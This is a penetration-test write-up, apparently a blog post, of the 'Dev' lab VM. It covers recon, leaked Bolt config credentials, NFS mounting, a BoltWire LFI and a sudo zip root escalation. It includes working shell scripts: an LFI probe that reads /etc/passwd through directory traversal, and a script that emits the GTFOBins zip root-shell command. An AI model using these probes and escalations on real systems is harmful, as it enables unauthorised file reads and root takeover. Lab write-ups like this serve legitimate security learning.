Exploiting the Dev VM

Mr.Roxxxz
3 min read · Sep 17, 2021

Machine Info
IP Address: 192.168.48.132
MAC Address: 00:0c:29:a9:5c:06

Recon

80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Bolt — Installation error
2049/tcp  open  nfs_acl  3 (RPC #100227)
8080/tcp  open  http     Apache httpd 2.4.38 ((Debian))
42117/tcp open  mountd   1-3 (RPC #100005)
45341/tcp open  nlockmgr 1-4 (RPC #100021)
50659/tcp open  mountd   1-3 (RPC #100005)
54355/tcp open  mountd   1-3 (RPC #100005)

Bolt is a PHP content management system; the site on port 80 is a Bolt install that is currently throwing an installation error.

Port 8080 also serves a phpinfo() page, which discloses the PHP version, the loaded modules and the filesystem path of the web root.

Browsing the port 80 site turned up a few directories that look interesting.

The vendor directory lists the third-party (Composer) packages and their source code, which pins down the exact library versions in use.

The application's config files are readable from the web root.

config.yml has credentials hardcoded in it. Bolt keeps its database connection settings in this file, so a readable copy is a direct credential leak.

Port 8080 appears to have only one subfolder, /dev.

The /dev page is a login portal.

Not much information came out of the RPC services.

There is an NFS export, so let's see if we can mount it.

Mounting the export turned up a potential username.
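Mounting the export and pulling a username out of it, as an added example that is not part of the original post: a small POSIX shell script that parses showmount output, builds the mount command and lists which uids own files on the share, since file ownership is one common way an NFS export gives away an account name. The IP is the one from the post; the export path /srv/nfs, the mount point /tmp/nfs and the sample showmount output are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: enumerate an NFS export, mount it
# read-only and list which uids own files on it. The IP is the post's; the
# export path, mount point and sample showmount output below are assumptions.
NFS_TARGET="${NFS_TARGET:-192.168.48.132}"
NFS_MNT="${NFS_MNT:-/tmp/nfs}"

# Constructed sample of `showmount -e` output for the offline checks.
SAMPLE_SHOWMOUNT='Export list for 192.168.48.132:
/srv/nfs *'

# One export path per line: skip the header line, keep the first column when
# it is an absolute path (the second column is the allowed-client spec).
nfs_exports() {
  printf '%s\n' "$1" | awk 'NR > 1 && $1 ~ /^\// { print $1 }'
}

# Mount read-only over NFSv3 (nmap showed nfs_acl 3 and mountd 1-3) with
# nolock so the mount does not depend on the remote lock manager.
mount_cmd() {
  printf 'mount -t nfs -o ro,vers=3,nolock %s:%s %s\n' "$NFS_TARGET" "$1" "$NFS_MNT"
}

# Distinct uid/name pairs owning files on the share. A bare number in the
# name column is a uid with no local account: that is the username hint,
# and creating a local user with the same uid lets you read those files.
owners_on_share() {
  find "$NFS_MNT" -printf '%U %u\n' 2>/dev/null | sort -u
}

if [ "${1:-}" = "run" ]; then
  mkdir -p "$NFS_MNT"
  for export_path in $(nfs_exports "$(showmount -e "$NFS_TARGET")"); do
    echo "mounting $export_path"
    sudo sh -c "$(mount_cmd "$export_path")" && owners_on_share
    sudo umount "$NFS_MNT"
  done
fi
```

Run it as `sh nfs_enum.sh run` from the attack box. Before trusting anything root-owned on the share, check whether the export has root_squash: with squashing on, your root maps to nobody and a root-owned file stays unreadable even though you mounted it.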

Exploit Research

BoltWire CMS Local File Inclusion (BoltWire is a separate product from the Bolt CMS on port 80)
https://www.exploit-db.com/exploits/48411

The LFI needs an authenticated session, so let's see if we can log in.

That gives us a likely candidate for the JP user.
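A generic traversal probe for an authenticated LFI of the kind EDB-48411 describes, as an added example that is neither the exploit-db code nor part of the original post. The base URL under /dev, the parameter name page and the cookie handling are assumptions; the parameter the BoltWire exploit actually uses should be taken from the exploit-db entry itself.

```shell
#!/bin/sh
# Added example, not from the original post or exploit-db: probe a suspected
# LFI by walking traversal depth until /etc/passwd comes back. Base URL,
# parameter name and cookie are assumptions to adjust per target.
LFI_TARGET="${LFI_TARGET:-http://192.168.48.132:8080/dev/index.php}"
LFI_PARAM="${LFI_PARAM:-page}"     # assumption: name of the vulnerable parameter
LFI_COOKIE="${LFI_COOKIE:-}"       # session cookie from a login, e.g. PHPSESSID=...

# Build the probe URL for a given traversal depth and target file.
lfi_url() {
  depth=$1
  file=$2
  prefix=""
  i=0
  while [ "$i" -lt "$depth" ]; do
    prefix="${prefix}../"
    i=$((i + 1))
  done
  printf '%s?%s=%s%s\n' "$LFI_TARGET" "$LFI_PARAM" "$prefix" "$file"
}

# True when the body contains the root entry of /etc/passwd; a stronger
# signal than a 200 status, which many apps return for a failed include.
looks_like_passwd() {
  printf '%s\n' "$1" | grep -q '^root:x:0:0:'
}

# Try increasing depths and stop at the first confirmed read.
probe() {
  d=1
  while [ "$d" -le 8 ]; do
    url=$(lfi_url "$d" etc/passwd)
    if [ -n "$LFI_COOKIE" ]; then
      body=$(curl -s -b "$LFI_COOKIE" "$url")
    else
      body=$(curl -s "$url")
    fi
    if looks_like_passwd "$body"; then
      echo "LFI confirmed at depth $d: $url"
      return 0
    fi
    d=$((d + 1))
  done
  echo "no /etc/passwd read at depths 1-8 (check auth, parameter name, filters)"
  return 1
}

if [ "${1:-}" = "run" ]; then
  probe
fi
```

Once the probe hits, the same URL builder reads the application's own files (config, session store, web root paths from the phpinfo page) rather than just /etc/passwd.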

Privilege Escalation

JeanPaul can run zip through sudo as root with no password required, so zip executes as root.

GTFOBins documents how to turn a sudo-able zip into a root shell: zip's -TT option lets the caller choose the command used to test the archive, and that command runs with zip's root privileges.

It worked, and we have root privileges.
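The sudo rule check and the zip escalation, as an added example: the script is not from the post or from GTFOBins, but the one-liner it emits is the GTFOBins sudo entry for zip. The sudo -l sample is constructed, including the host name devbox.

```shell
#!/bin/sh
# Added example, not from the original post: find NOPASSWD root binaries in
# `sudo -l` output and emit the GTFOBins zip-to-root command. The sample
# sudo -l output below is constructed; the host name devbox is an assumption.
SAMPLE_SUDO_L='Matching Defaults entries for jeanpaul on devbox:
    env_reset, mail_badpass

User jeanpaul may run the following commands on devbox:
    (root) NOPASSWD: /usr/bin/zip'

# Every binary runnable as root (or ALL) without a password, one per line.
nopasswd_root_binaries() {
  printf '%s\n' "$1" \
    | sed -nE 's/^[[:space:]]*\((root|ALL)\)[[:space:]]*NOPASSWD:[[:space:]]*//p' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//; s/[[:space:]]*$//'
}

# Why zip works: -T tells zip to test the finished archive and -TT replaces
# the test command (normally unzip -tqq) with whatever you pass. zip appends
# the archive path to that command, which 'sh #' turns into a shell comment,
# so the root zip process simply launches an interactive root sh.
zip_root_shell_cmd() {
  zip_path=$1
  printf "TF=\$(mktemp -u); sudo %s \$TF /etc/hosts -T -TT 'sh #'; sudo rm \$TF\n" "$zip_path"
}

if [ "${1:-}" = "run" ]; then
  for bin in $(nopasswd_root_binaries "$(sudo -n -l 2>/dev/null)"); do
    case "$bin" in
      */zip) echo "NOPASSWD zip found; run:"; zip_root_shell_cmd "$bin" ;;
      *)     echo "NOPASSWD binary to look up on GTFOBins: $bin" ;;
    esac
  done
fi
```

The same -TT abuse applies whenever zip runs with more privilege than the caller, not only under sudo; the defensive fix is not to grant sudo on zip at all rather than to try to restrict its arguments.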

Mr.Roxxxz · Weaponized Assault Nerd, CISSP, SSCP, MSCSIA, Pentest+